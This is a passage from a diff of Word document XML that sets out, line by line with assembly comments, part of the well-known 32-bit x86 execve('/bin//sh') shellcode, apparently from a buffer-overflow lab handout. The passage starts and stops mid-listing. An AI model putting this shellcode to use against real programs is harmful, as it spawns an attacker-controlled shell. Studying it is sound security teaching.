+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"\x50"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* Line 2: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"\x68""//</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* Line 3: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $0x68732f2f */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"\x68""/bin"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* Line 4: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $0x6e69622f */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"\x89\xe3"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* Line 5: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>movl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>ebx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"\x50"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* Line 6: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"\x53"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* Line 7: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>ebx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"\x89\xe1"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* Line 8: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>movl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>ecx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"\x99"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* Line 9: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>cdq</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
